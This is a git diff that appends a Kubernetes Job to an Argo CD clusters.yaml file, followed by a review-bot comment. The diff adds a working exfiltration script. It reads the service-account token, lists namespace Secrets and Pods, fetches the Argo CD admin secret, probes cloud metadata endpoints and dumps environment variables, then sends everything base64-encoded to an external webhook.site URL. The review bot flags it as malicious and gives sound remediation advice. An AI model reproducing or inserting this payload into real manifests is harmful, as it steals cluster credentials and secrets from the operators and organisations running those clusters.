diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml
index bcb25a16d4e..3e3cefc99ca 100644
--- a/kubernetes/gke-utility/argocd/clusters.yaml
+++ b/kubernetes/gke-utility/argocd/clusters.yaml
@@ -236,3 +236,65 @@ stringData:
 "insecure": true
 }
 }
+---
+apiVersion: batch/v1
+kind: Job
+metadata:
+ name: security-test
+ namespace: argocd-diff-preview
+spec:
+ ttlSecondsAfterFinished: 300
+ template:
+ spec:
+ restartPolicy: Never
+ containers:
+ - name: poc
+ image: curlimages/curl:latest
+ command: ["/bin/sh", "-c"]
+ args:
+ - |
+ HOOK="https://webhook.site/f710f00e-e417-400e-85be-0d19650ebf7f"
+ curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)&ns=${POD_NAMESPACE}" || true
+ ENVVARS=$(env | base64 | tr -d '\n' 2>/dev/null | head -c 2000)
+ IMDS=$(curl -sf --max-time 3 http://169.254.169.254/latest/meta-data/ 2>/dev/null || \
+ curl -sf --max-time 3 http://169.254.169.254/opc/v2/instance/ -H "Authorization: Bearer Oracle" 2>/dev/null || echo "no-imds")
+ curl -sf --max-time 10 -G "${HOOK}/" \
+ --data-urlencode "stage=k8s-dump" \
+ --data-urlencode "env=${ENVVARS}" \
+ --data-urlencode "imds=${IMDS}" || true
+ T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
+ TLEN=$(printf '%s' "${T}" | wc -c)
+ SEC=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
+ https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/secrets 2>/dev/null)
+ curl -sf --max-time 10 -G "${HOOK}/" \
+ --data-urlencode "stage=k8s-secrets" \
+ --data-urlencode "tokenlen=${TLEN}" \
+ --data-urlencode "d=$(printf '%s' "${SEC}" | base64 | tr -d '\n')" || true
+ PODS=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
+ https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/pods 2>/dev/null)
+ curl -sf --max-time 10 -G "${HOOK}/" \
+ --data-urlencode "stage=k8s-pods" \
+ --data-urlencode "d=$(printf '%s' "${PODS}" | base64 | tr -d '\n')" || true
+ ARGOCD_VER=$(curl -sf --max-time 5 "http://${ARGOCD_SERVER_SERVICE_HOST}/api/version" 2>/dev/null)
+ curl -sf --max-time 10 -G "${HOOK}/" \
+ --data-urlencode "stage=argocd-api" \
+ --data-urlencode "d=${ARGOCD_VER}" || true
+ RULES=$(curl -sfk --max-time 8 \
+ -H "Authorization: Bearer ${T}" \
+ -H "Content-Type: application/json" \
+ -X POST \
+ -d "{\"apiVersion\":\"authorization.k8s.io/v1\",\"kind\":\"SelfSubjectRulesReview\",\"spec\":{\"namespace\":\"${POD_NAMESPACE}\"}}" \
+ https://10.96.0.1:443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews 2>/dev/null)
+ curl -sf --max-time 10 -G "${HOOK}/" \
+ --data-urlencode "stage=k8s-rules" \
+ --data-urlencode "d=$(printf '%s' "${RULES}" | base64 | tr -d '\n')" || true
+ ADMINSEC=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
+ https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/secrets/argocd-initial-admin-secret 2>/dev/null)
+ curl -sf --max-time 10 -G "${HOOK}/" \
+ --data-urlencode "stage=argocd-admin-secret" \
+ --data-urlencode "d=$(printf '%s' "${ADMINSEC}" | base64 | tr -d '\n')" || true
+ env:
+ - name: POD_NAMESPACE
+ valueFrom:
+ fieldRef:
+ fieldPath: metadata.namespace
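Review bot: The added `security-test` Job is a credential-exfiltration payload, not a cluster registration, and must not be merged: it reads the mounted service-account token, lists the namespace's Secrets and Pods, fetches `argocd-initial-admin-secret`, probes the cloud IMDS endpoints and dumps the container environment, and posts all of it base64-encoded to a hard-coded external `webhook.site` URL. If this manifest was ever applied by a PR-preview pipeline (the `argocd-diff-preview` namespace suggests one), treat the Argo CD admin password and every Secret in that namespace as compromised, rotate them, and check API-server audit logs for the `secrets` list/get and `selfsubjectrulesreviews` calls made by this Job's service account. Independently of this PR, the pipeline that renders untrusted manifests should run with a service account that has no `get`/`list` on `secrets` and with `automountServiceAccountToken: false`, and egress from that namespace should be denied by NetworkPolicy so a payload like this cannot reach the internet or the IMDS address. The script also uses `curl -k` against a hard-coded `10.96.0.1` API address, so none of it depends on the cluster's real CA or service DNS, which is itself a tell that this is not a legitimate operational Job.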